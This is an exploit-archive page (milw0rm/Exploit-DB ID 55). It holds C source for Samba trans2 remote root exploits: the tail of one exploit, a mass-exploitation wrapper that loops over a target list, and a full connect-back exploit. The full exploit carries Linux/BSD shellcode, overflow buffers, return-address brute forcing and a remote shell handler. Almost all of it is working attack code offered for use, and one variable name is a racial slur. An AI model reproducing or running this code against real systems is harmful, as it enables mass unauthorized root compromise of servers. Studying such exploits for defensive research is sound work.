                                                }
                                                break;
                                }
                        }

                }

                return 0;
        }


        he = gethostbyname(argv[optind]);

        if (he == NULL) {
                fprintf(stderr, "Unable to resolve %s...\n", argv[optind]);
                return -1;
        }

        if (brute == -1) {

                if (ret == 0) ret = targets[type - 1].ret;

                shellcode = targets[type - 1].shellcode;

                if (connectback == 1) {
                        fprintf(stdout, "+ connecting back to: [%d.%d.%d.%d:452
95]\n", 
                                        ip1, ip2, ip3, ip4);

                        switch(targets[type - 1].os_type) {
                                case 0: /* linux */
                                        shellcode = linux_connect_back;
                                        break;
                                case 1: /* FreeBSD/NetBSD */
                                        shellcode = bsd_connect_back;
                                        break;
                                case 2: /* OpenBSD */
                                        shellcode = bsd_connect_back;
                                        break;
                                case 3: /* OpenBSD 3.2 Non-exec stack */
                                        shellcode = bsd_connect_back;
                                        break;
                        }

                }

                if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
                        fprintf(stderr, "+ socket() error.\n");
                        return -1;
                }

                if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
                        fprintf(stderr, "+ socket() error.\n");
                        return -1;
                }

                memcpy(&addr1.sin_addr, he->h_addr, he->h_length);
                memcpy(&addr2.sin_addr, he->h_addr, he->h_length);

                addr1.sin_family = AF_INET;
                addr1.sin_port   = htons(port); 
                addr2.sin_family = AF_INET;
                addr2.sin_port   = htons(45295);

                if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == 
-1) { 
                        fprintf(stderr, "+ connect() error.\n");
                        return -1;
                }

                if (verbose == 1) fprintf(stdout, "+ %s\n", targets[type - 1].t
ype);

                if (force == 0) {

                        if (is_samba(argv[optind], 2) != 0) {
                                fprintf(stderr, "+ Host is not running samba!\n
\n");
                                return -1;
                        }

                        fprintf(stderr, "+ Host is running samba.\n");
                }

                if (verbose == 1) fprintf(stdout, "+ Connected to [%s:%d]\n", (
char *)inet_ntoa(addr1.sin_addr), port);

                if (start_session(sock) < 0) fprintf(stderr, "+ Session failed.
\n");

                if (verbose == 1) fprintf(stdout, "+ Session enstablished\n");
                sleep(5);
                if (targets[type - 1].os_type != 2) {
                        if (exploit_normal(sock, ret, shellcode) < 0) {
                                fprintf(stderr, "+ Failed.\n");
                                close(sock);
                        }
                } else {
                        if (exploit_openbsd32(sock, ret, shellcode) < 0) {
                                fprintf(stderr, "+ Failed.\n");
                                close(sock);
                        }
                }

                sleep(2);

                if (connectback == 0) {
                        if(connect(sock2, (struct sockaddr *)&addr2, sizeof(add
r2)) == -1) {
                                fprintf(stderr, "+ Exploit failed, try -b to br
uteforce.\n");

                                return -1;
                        }

                        fprintf(stdout, "--------------------------------------
------------------------\n");

                        shell(sock2);
                        close(sock);
                        close(sock2);
                } else {
                        fprintf(stdout, "+ Done...\n");
                        close(sock2);
                        close(sock);
                }
                return 0;
        }

        signal(SIGPIPE, SIG_IGN);
        signal(SIGUSR1, handler);

        switch(brute) {
                case 0:
                        if (ret == 0) ret = 0xc0000000;
                        shellcode = linux_bindcode;
                        fprintf(stdout, "+ Bruteforce mode. (Linux)\n");
                        break;
                case 1:
                        if (ret == 0) ret = 0xbfc00000;
                        shellcode = bsd_bindcode;
                        fprintf(stdout, "+ Bruteforce mode. (FreeBSD / NetBSD)\
n");
                        break;
                case 2:
                        if (ret == 0) ret = 0xdfc00000;
                        shellcode = bsd_bindcode;
                        fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.1 and pr
ior)\n");
                        break;
                case 3:
                        if (ret == 0) ret = 0x00170000;
                        shellcode = bsd_bindcode;
                        fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.2 - non-
exec stack)\n");
                        break;
                }

        memcpy(&addr1.sin_addr, he->h_addr, he->h_length);
        memcpy(&addr2.sin_addr, he->h_addr, he->h_length);

        addr1.sin_family = AF_INET;
        addr1.sin_port   = htons(port);
        addr2.sin_family = AF_INET;
        addr2.sin_port   = htons(45295);

        for (i = 0; i < 100; i++)
                childs[i] = -1;
        i = 0;

        if (force == 0) {
                if (is_samba(argv[optind], 2) != 0) {
                        fprintf(stderr, "+ Host is not running samba!\n\n");
                        return -1;
                }

                fprintf(stderr, "+ Host is running samba.\n");
        }

        while (OWNED == 0) {

                if (sock  > 2) close(sock);
                if (sock2 > 2) close(sock2);

                if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
                        if (verbose == 1) fprintf(stderr, "+ socket() error.\n"
);
                }
                else {  
                        ret -= STEPS;
                        i++;
                }

                if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0)
                        if (verbose == 1) fprintf(stderr, "+ socket() error.\n"
);


                if ((ret & 0xff) == 0x00 && brute != 3) ret++;

                if (verbose == 1) fprintf(stdout, "+ Using ret: [0x%08x]\n", (u
nsigned int)ret);

                usleep(BRUTE_DELAY);

                switch (childs[i] = fork()) {
                        case 0:
                                if(Connect(sock, (char *)inet_ntoa(addr1.sin_ad
dr), port, 2) == -1) {
                                        if (sock  > 2) close(sock);
                                        if (sock2 > 2) close(sock2);
                                        exit(-1);
                                }

                                if(write_timer(sock, 3) == 1) {
                                        if (start_session(sock) < 0) {
                                                if (verbose == 1) fprintf(stder
r, "+ Session failed.\n");
                                                if (sock  > 2)close(sock);
                                                if (sock2 > 2) close(sock2);
                                                exit(-1);
                                        }

                                        if (brute == 3) {
                                                if (exploit_openbsd32(sock, ret
, shellcode) < 0) {
                                                        if (verbose == 1) fprin
tf(stderr, "+ Failed.\n");
                                                        if (sock  > 2) close(so
ck);
                                                        if (sock2 > 2) close(so
ck2);
                                                        exit(-1);
                                                }
                                        } 
                                else {
                                        if (exploit_normal(sock, ret, shellcode
) < 0) {
                                                if (verbose == 1) fprintf(stder
r, "+ Failed.\n");
                                                if (sock  > 2) close(sock);
                                                if (sock2 > 2) close(sock2);
                                                exit(-1);
                                        }

                                        if (sock > 2) close(sock);

                                        if ((sock2 = socket(AF_INET, SOCK_STREA
M, 6)) < 0) {
                                                if (sock2 > 2) close(sock2);
                                                exit(-1);
                                        }

                                        if(Connect(sock2, (char *)inet_ntoa(add
r1.sin_addr), 45295, 2) != -1) {
                                                if (sock2  > 2) close(sock2);
                                                kill(getppid(), SIGUSR1);
                                        }

                                        exit(1);
                                }


                                exit(0);
                                break;
                        case -1:
                                fprintf(stderr, "+ fork() error\n");
                                exit(-1);
                                break;
                        default:
                                if (i > MAX_CHILDS - 2) {
                                        wait(&status);
                                        i--;
                                }
                                break;
                        }

                }

        }

        return 0;
}

// milw0rm.com [2003-04-10]
		

- 漏洞信息 (55)

Samba 2.2.8 (Bruteforce Method) Remote Root Exploit (EDBID:55)
linux remote
2003-07-13 Verified
139 Schizoprenic
N/A [点击下载]
/* 
 * Mass Samba Exploit by Schizoprenic
 * Xnuxer-Research (c) 2003
 * This code just for eduction purpose 
 */

#include <stdio.h> 
#include <stdlib.h> 
#include <sys/stat.h> 

void usage(char *s)
{
  printf("Usage: %s  \n",s);
  exit(-1);
}

int main(int argc, char **argv)
{
  printf("Mass Samba Exploit by Schizoprenic\n");
  if(argc != 3) usage(argv[0]);
  scan(argv[1], argv[2]);
  return 0;
}

int scan(char *fl, char *bind_ip)
{
  FILE *nigger,*fstat;
  char buf[512];
  char cmd[100];
  int i;
  struct stat st;
   
  if((nigger=fopen(fl,"r")) == NULL) {
    fprintf(stderr,"File %s not found!\n", fl);
    return -1;
  }

  while(fgets(buf,512,nigger) != NULL)
  {
    if(buf[strlen(buf)-1]=='\n') buf[strlen(buf)-1]=0;
    for (i=0;i<4;i++) {
       sprintf(cmd, "./smb %d %s %s", i, buf, bind_ip);
       printf("\nTrying get root %s use type %d ...\n",buf,i);
       system(cmd);
       if (stat(".ROOT", &st) != -1) {
          unlink(".ROOT");
          break; 
       }
    }    
  }
  fclose(nigger);
  printf("\nMass exploiting finished.\n");
}


/*
 *  Samba Remote Root Exploit by Schizoprenic from Xnuxer-Labs, 2003.
 *  Using connect back method and brute force mode.
 *  I just create & modify some code and ripped too :P 
 *  Create on May, 12st 2003
 *
 *  Thanks to eDSee (netric.org), Sambal is nice exploit bro...
 *  References: trans2root.pl, 0x333hate.c, sambal.c
 *  This code just for eduction purpose 
 *
 *  XNUXER RESEARCH LABORATORY
 *  Official Site: http://infosekuriti.com
 *  Contact Email: xnuxer@yahoo.com, xnuxer@hackermail.com
 */

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

char
linux_connect_back[] =
    /* fork(), execve sh -c [client] [host to bounce to], term=xterm */
    "\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50"
    "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
    "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
    "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
    "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68"
    "\x2d\x63\x89\xe3\x50\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50"
    "\x89\xe1\x31\xc0\x50\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68"
    "\x54\x45\x52\x4d\x89\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73"
    "\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80\x31\xc0\xb0"
    "\x01\xcd\x80"

    /* connect back shellcode (port=0xb0ef) */
    "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
    "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51"
    "\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3"
    "\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
    "\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
    "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
    "\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f"
    "\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
    "\x01\xcd\x80";

char
bsd_connect_back[] =
    /* fork(), execve sh -c [client] [host to bounce to], term=xterm */
    "\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50"
    "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
    "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
    "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20"
    "\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68\x2d\x63\x89\xe3\x50"
    "\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50\x89\xe1\x31\xc0\x50"
    "\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68\x54\x45\x52\x4d\x89"
    "\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
    "\x69\x89\xe3\x50\x52\x51\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0"
    "\x01\xcd\x80"

    /* connect back shellcode (port=0xb0ef) */
    "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
    "\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef"
    "\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0"
    "\xb0\x62\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80"
    "\x31\xc0\x50\x52\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x52"
    "\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x52\x50\xb0\x5a\xcd\x80\x31"
    "\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54"
    "\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

typedef struct {
	unsigned char type;
	unsigned char flags;
	unsigned short length;
} NETBIOS_HEADER;

typedef struct {
	unsigned char protocol[4];
	unsigned char command;
	unsigned short status;
	unsigned char reserved;
	unsigned char  flags;
	unsigned short flags2;
	unsigned char  pad[12];
	unsigned short tid;
	unsigned short pid;
	unsigned short uid;
	unsigned short mid;
} SMB_HEADER;

pid_t childs[50];
int LOOP = 1;
struct sockaddr_in serv_addr;
int sock_listen, client;
int exploit_pid;
int listen_pid;
int port_listen = 45295;

void 
usage(char *prog) 
{
int i;

   fprintf(stdout, "Samba < 2.2.8 Remote Root exploit by Schizoprenic\n"
                   "Connect back method, Xnuxer-Labs, 2003.\n"
                   "Usage  : %s   \n"
                   "Targets:\n"
                   "         0 = Linux\n"
                   "         1 = FreeBSD/NetBSD\n"
                   "         2 = OpenBSD 3.0 and prior\n"
                   "         3 = OpenBSD 3.2 - non-exec stack\n\n", prog);      
   exit(1);
}

int 
Connect(int fd, char *ip, unsigned int port, unsigned int time_out) 
{
	/* ripped from no1 */

	int                      flags;
	int                      select_status;
	fd_set                   connect_read, connect_write;
	struct timeval           timeout;
	int                      getsockopt_length = 0;
	int                      getsockopt_error = 0;
	struct sockaddr_in       server;
	bzero(&server, sizeof(server));
	server.sin_family = AF_INET;
	inet_pton(AF_INET, ip, &server.sin_addr);
	server.sin_port = htons(port);

	if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
		close(fd);
    		return -1;
  	}
  
	if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
		close(fd);
    		return -1;
  	}
  	
	timeout.tv_sec = time_out;
	timeout.tv_usec = 0;
	FD_ZERO(&connect_read);
	FD_ZERO(&connect_write);
	FD_SET(fd, &connect_read);
	FD_SET(fd, &connect_write);

	if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0) {
		if(errno != EINPROGRESS) {
      			close(fd);
      			return -1;
    		}
  	}
	else {
		if(fcntl(fd, F_SETFL, flags) < 0) {
			close(fd);
      			return -1;
    		}
    		
		return 1;

	}

	select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout);

	if(select_status == 0) {
		close(fd);
		return -1;

	}

	if(select_status == -1) {
		close(fd);
		return -1;
	}

	if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write)) {
		if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write)) {
			getsockopt_length = sizeof(getsockopt_error);

			if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length)
< 0) {
				errno = ETIMEDOUT;
				close(fd);
				return -1;
			}

			if(getsockopt_error == 0) {
				if(fcntl(fd, F_SETFL, flags) < 0) {
					close(fd);
					return -1;
				}
				return 1;
		        } 

			else {
				errno = getsockopt_error;
				close(fd);
				return (-1);
				}

			}
		}
	else {
		close(fd);
		return 1;
	}

	if(fcntl(fd, F_SETFL, flags) < 0) {
		close(fd);
		return -1;
	}
	return 1;
}

int 
read_timer(int fd, unsigned int time_out)
{

	/* ripped from no1 */

	int                      flags;
	int                      select_status;
	fd_set                   fdread;
	struct timeval           timeout;

	if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
		close(fd);
		return (-1);
	}

	if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
		close(fd);
		return (-1);
	}

	timeout.tv_sec = time_out;
	timeout.tv_usec = 0;
	FD_ZERO(&fdread);
	FD_SET(fd, &fdread);
	select_status = select(fd + 1, &fdread, NULL, NULL, &timeout);

	if(select_status == 0) {
		close(fd);
		return (-1);
	}

	if(select_status == -1) {
		close(fd);
		return (-1);
	}
  
	if(FD_ISSET(fd, &fdread)) {
  
  		if(fcntl(fd, F_SETFL, flags) < 0) {
			close(fd);
      			return -1;
    		}
    		
		return 1;
	
	} 
	else {
		close(fd);
		return 1;

	}
}

int
write_timer(int fd, unsigned int time_out)
{

	/* ripped from no1 */

	int                      flags;
	int                      select_status;
	fd_set                   fdwrite;
	struct timeval           timeout;

	if((flags = fcntl(fd, F_GETFL, 0)) < 0) {    
		close(fd);
		return (-1);
	}
	
	if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
		close(fd);
		return (-1);
  	}
  	
	timeout.tv_sec = time_out;
	timeout.tv_usec = 0;
	FD_ZERO(&fdwrite);
	FD_SET(fd, &fdwrite);

	select_status = select(fd + 1, NULL, &fdwrite, NULL, &timeout);

	if(select_status == 0) {
		close(fd);
		return -1;
	}
	
	if(select_status == -1) {
		close(fd);
		return -1;
	}

	if(FD_ISSET(fd, &fdwrite)) {
		if(fcntl(fd, F_SETFL, flags) < 0) {
			close(fd);
			return -1;
		}
		return 1;
	}
	else { 
		close(fd);
		return -1;
	}
}

int 
start_session(int sock)
{
	char buffer[1000];
	char response[4096];
	char session_data1[] 	= "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00";
        char session_data2[] 	= "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64\x79"
		                  "\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24";
	
        NETBIOS_HEADER  *netbiosheader;
        SMB_HEADER      *smbheader;

	memset(buffer, 0x00, sizeof(buffer));

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type 	= 0x00;         /* session message */
        netbiosheader->flags 	= 0x00;
        netbiosheader->length 	= htons(0x2E);

        smbheader->protocol[0] 	= 0xFF;
        smbheader->protocol[1] 	= 'S';
        smbheader->protocol[2] 	= 'M';
        smbheader->protocol[3] 	= 'B';
        smbheader->command 	= 0x73;         /* session setup */
        smbheader->flags 	= 0x08;         /* caseless pathnames */
        smbheader->flags2 	= 0x01;         /* long filenames supported */
        smbheader->pid 		= getpid() & 0xFFFF;
	smbheader->uid          = 100;
        smbheader->mid 		= 0x01;

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data1,
sizeof(session_data1) - 1);

	if(write_timer(sock, 3) == 1)
		if (send(sock, buffer, 50, 0) < 0) return -1;

	memset(response, 0x00, sizeof(response));

	if (read_timer(sock, 3) == 1)
		if (read(sock, response, sizeof(response) - 1) < 0) return -1;
	
        netbiosheader = (NETBIOS_HEADER *)response;
        smbheader     = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));

	//if (netbiosheader->type != 0x00) fprintf(stderr, "+ Recieved a non session message\n");

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        memset(buffer, 0x00, sizeof(buffer));

        netbiosheader->type     = 0x00;         /* session message */
        netbiosheader->flags    = 0x00;
        netbiosheader->length   = htons(0x3C);

        smbheader->protocol[0]  = 0xFF;
        smbheader->protocol[1]  = 'S';
        smbheader->protocol[2]  = 'M';
        smbheader->protocol[3]  = 'B';
        smbheader->command      = 0x70;         /* start connection */
	smbheader->pid          = getpid() & 0xFFFF;
	smbheader->tid		= 0x00;
        smbheader->uid          = 100;

	memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data2, sizeof(session_data2)
- 1);

        if(write_timer(sock, 3) == 1)
                if (send(sock, buffer, 64, 0) < 0) return -1;

        memset(response, 0x00, sizeof(response));

        if (read_timer(sock, 3) == 1)
                if (read(sock, response, sizeof(response) - 1) < 0) return -1;

        netbiosheader = (NETBIOS_HEADER *)response;
        smbheader     = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));

        if (netbiosheader->type != 0x00) return -1;

        return 0;
}

int
exploit_normal(int sock, unsigned long ret, char *shellcode)
{

	char buffer[4000];
        char exploit_data[] =
                "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"

		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x90";

	int i = 0;
	unsigned long dummy = ret - 0x90;

        NETBIOS_HEADER  *netbiosheader;
        SMB_HEADER      *smbheader;

	memset(buffer, 0x00, sizeof(buffer));

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type             = 0x00;         /* session message */
        netbiosheader->flags            = 0x04;
        netbiosheader->length           = htons(2096);

        smbheader->protocol[0]          = 0xFF;
        smbheader->protocol[1]          = 'S';
        smbheader->protocol[2]          = 'M';
        smbheader->protocol[3]          = 'B';
        smbheader->command              = 0x32;         /* SMBtrans2 */
	smbheader->tid			= 0x01;
        smbheader->uid                  = 100;

	memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data),
0x90, 3000);

	buffer[1096] = 0xEB;
	buffer[1097] = 0x70;

	for (i = 0; i < 4 * 24; i += 8) {
		memcpy(buffer + 1099 + i, &dummy, 4);
		memcpy(buffer + 1103 + i, &ret,   4);
	}

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), 
			exploit_data, sizeof(exploit_data) - 1);
	memcpy(buffer + 1800, shellcode, strlen(shellcode));

	if(write_timer(sock, 3) == 1) {
		if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
		return 0;
	}

	return -1;
}

int
exploit_openbsd32(int sock, unsigned long ret, char *shellcode)
{
        char buffer[4000];

        char exploit_data[] =
                "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                "\x00\x00\x00\x90";

        int i = 0;
        unsigned long dummy = ret - 0x30;
        NETBIOS_HEADER  *netbiosheader;
        SMB_HEADER      *smbheader;

        memset(buffer, 0x00, sizeof(buffer));

        netbiosheader   = (NETBIOS_HEADER *)buffer;
        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type             = 0x00;         /* session message */
        netbiosheader->flags            = 0x04;
        netbiosheader->length           = htons(2096);

        smbheader->protocol[0]          = 0xFF;
        smbheader->protocol[1]          = 'S';
        smbheader->protocol[2]          = 'M';
        smbheader->protocol[3]          = 'B';
        smbheader->command              = 0x32;         /* SMBtrans2 */
        smbheader->tid                  = 0x01;
        smbheader->uid                  = 100;

        memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data),
0x90, 3000);

	for (i = 0; i < 4 * 24; i += 4)
		memcpy(buffer + 1131 + i, &dummy, 4);
		
        memcpy(buffer + 1127, &ret,      4);

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),
                        exploit_data, sizeof(exploit_data) - 1);

        memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode));

        if(write_timer(sock, 3) == 1) {
                if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
                return 0;
        }

        return -1;
}


void shell(int sock)
{
 fd_set  fd_read;
 char buff[1024], *cmd="uname -a;id;\n";
 int n;

 send(sock, cmd, strlen(cmd), 0);

 while(1) {
  FD_SET(sock,&fd_read);
  FD_SET(0,&fd_read);

  if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;

  if( FD_ISSET(sock, &fd_read) ) {
   n=read(sock,buff,sizeof(buff));
   if (n == 0) {
       printf ("Connection closed.\n");
       exit(EXIT_FAILURE);
   } else if (n < 0) {
       perror("read remote");
       exit(EXIT_FAILURE);
   }
   write(1,buff,n);
  }

  if ( FD_ISSET(0, &fd_read) ) {
    if((n=read(0,buff,sizeof(buff)))<=0){
      perror ("read user");
      exit(EXIT_FAILURE);
    }
    write(sock,buff,n);
  }
 }
 close(sock); 
}

void GoAway() 
{
   exit(0);
}

void start_listen()
{
FILE *fstat;
int cpid;
   
LISTENER:

  bzero(&serv_addr, sizeof(serv_addr));
  serv_addr.sin_family=2;
  serv_addr.sin_addr.s_addr=0;
  serv_addr.sin_port=htons(port_listen); 
  sock_listen=socket(2,1,6);

  if(bind(sock_listen,(struct sockaddr *)&serv_addr,16)) 
  {   
      port_listen++;
      goto LISTENER;       
  }
   
  if(listen(sock_listen,1)) 
  {
      perror("listen");
      exit(1);
  }
   
  fprintf(stdout, "[+] Listen on port: %d\n",port_listen);
   
  cpid = fork();
 
  if (cpid) {
     client=accept(sock_listen,0,0);
     LOOP = 0;
     kill(SIGUSR2, exploit_pid);
     if (client > 0) {
        fprintf(stdout, "[+] Yeah, I have a root ....!\n"
                      "------------------------------\n");
        fstat=fopen(".ROOT", "a");  //needed by mass.c
        fclose(fstat);
        shell(client);
     }
     exit(0);
  }
}

int
main (int argc,char *argv[])
{
   char *shellcode = NULL;
   int typeos	= -1;
   int port		= 139;
   int sock		= 0;
   int i		= 0;
   int status	= 0;
   int m		= 0;
   int ip1		= 0;
   int ip2		= 0;
   int ip3		= 0;
   int ip4		= 0;
   int sta		= 0;
   int STEPS	= 512;
   int ENDLOOP    = 64;
   char *desc; 
   unsigned long MAX_CHILDS  = 40;
   unsigned long ret         = 0x0;
   unsigned short int  a_port;
   struct sockaddr_in addr1;
   struct hostent *he;
   struct stat st;
   
      if (argc != 4) usage(argv[0]);
   
      typeos = atoi(argv[1]);
      if (typeos > 3) {
          fprintf(stdout, "Os type out of list!\n");
          exit(1);
      }

      he = gethostbyname(argv[2]);

      if (he == NULL) {
          fprintf(stderr, "Unable to resolve\n");
          return -1;
      }

      listen_pid = getpid();
      start_listen();
      exploit_pid = listen_pid + 1;

      //fprintf(stdout, "[+] Listen pid: %d, exploit pid: %d\n", listen_pid,exploit_pid);

      sscanf(argv[3], "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4);		
      linux_connect_back[171] = ip1; bsd_connect_back[162] = ip1;
      linux_connect_back[172] = ip2; bsd_connect_back[163] = ip2;
      linux_connect_back[173] = ip3; bsd_connect_back[164] = ip3;
      linux_connect_back[174] = ip4; bsd_connect_back[165] = ip4;
				
      fprintf(stdout, "[+] Connecting back to: [%d.%d.%d.%d:%d]\n", 
					ip1, ip2, ip3, ip4, port_listen);

      a_port = htons(port_listen);
      
      linux_connect_back[177]= (a_port) & 0xff;
      linux_connect_back[178]= (a_port >> 8) & 0xff;
      bsd_connect_back[168]= (a_port) & 0xff;
      bsd_connect_back[169]= (a_port >> 8) & 0xff;

      switch(typeos) {
      case 0:
              desc = "Linux";
              ret = 0xc0000000;
              shellcode = linux_connect_back;
              break;
      case 1:
              desc = "FreeBSD/NetBSD";
              ret = 0xbfc00000;
              shellcode = bsd_connect_back;
              break;
      case 2:
              desc = "OpenBSD 3.1 and prior";
              ret = 0xdfc00000;
              shellcode = bsd_connect_back;
              break;
      case 3:
              desc = "OpenBSD 3.2 non-exec stack";
              ret = 0x00170000;
              shellcode = bsd_connect_back;
              break;
      }

      fprintf(stdout, "[+] Target: %s\n", desc);
      memcpy(&addr1.sin_addr, he->h_addr, he->h_length);

      addr1.sin_family = AF_INET;
      addr1.sin_port	 = htons(port);	

      fprintf(stdout, "[+] Connected to [%s:%d]\n", (char *)inet_ntoa(addr1.sin_addr),
port);
      fprintf(stdout, "[+] Please wait in seconds...!\n");

      signal(SIGUSR2, GoAway);
   
      for (i = 0; i < 50; i++) childs[i] = -1;
      i = 0; m = 0;

      while (LOOP) {

           if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
              fprintf(stderr, "[+] socket() error.\n");
              exit(-1);
           }

           ret -= STEPS; i++;
           if ((ret & 0xff) == 0x00 && typeos != 3) ret++;             

           m++; 
           //fflush(0);
           //fprintf(stdout, "[+] Return Address: 0x%08x [%02d]\n", (unsigned int)ret,
m);

           usleep(150000);

           switch (childs[i] = fork()) {
           case 0:  
                  if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == -
1) { 
                      //fprintf(stderr, "[+] connect() error.\n");
                      close(sock);
                      exit(-1);
                  }
			
                 start_session(sock);
                 sleep(3);
		     		         
                 if (typeos != 3) {
                           if (exploit_normal(sock, ret, shellcode) < 0) {
                              //fprintf(stderr, " -> Failed.\n");
                              close(sock);
                              exit(-1);
                           }
                 } else {
                           if (exploit_openbsd32(sock, ret, shellcode) < 0) {
                              //fprintf(stderr, " -> Failed.\n");
                              close(sock);
                              exit(-1);
                           }
                  }
                  sleep(5);
                  close(sock);
                  exit(0);
                  break;
           case -1:
                  exit(-1);
                  break;
           default:
                  if (i > MAX_CHILDS - 2) {
                      wait(&status);
                      i--;
                  }
                  break;
           } 

           if (m == ENDLOOP) LOOP = 0;
      } 	   

      if (stat(".ROOT", &st) != -1) 
         kill(SIGUSR2, listen_pid);
      else {	
           fprintf(stdout, "[+] Dohh, exploit failed.\n");
	   close(client); close(sock_listen);
           kill(listen_pid, SIGUSR2);
	   sleep(2);
	   exit(0);
      }
}

